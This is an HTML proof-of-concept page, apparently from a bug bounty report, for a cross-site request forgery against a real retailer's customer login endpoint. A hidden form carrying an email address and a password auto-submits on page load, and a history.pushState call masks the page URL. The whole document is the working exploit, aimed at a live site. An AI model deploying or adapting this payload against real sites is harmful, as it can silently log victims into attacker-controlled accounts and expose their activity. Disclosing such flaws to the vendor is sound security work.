<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://ceres-customer.debijenkorf.nl/customer/user/authenticate" method="POST">
      <input type="hidden" name="email" value="thetiger&#43;2&#64;wearehackerone&#46;com" />
      <input type="hidden" name="password" value="bmV3UGFzc3cwcmQx" />
      <input type="hidden" name="locale" value="nl&#95;NL" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
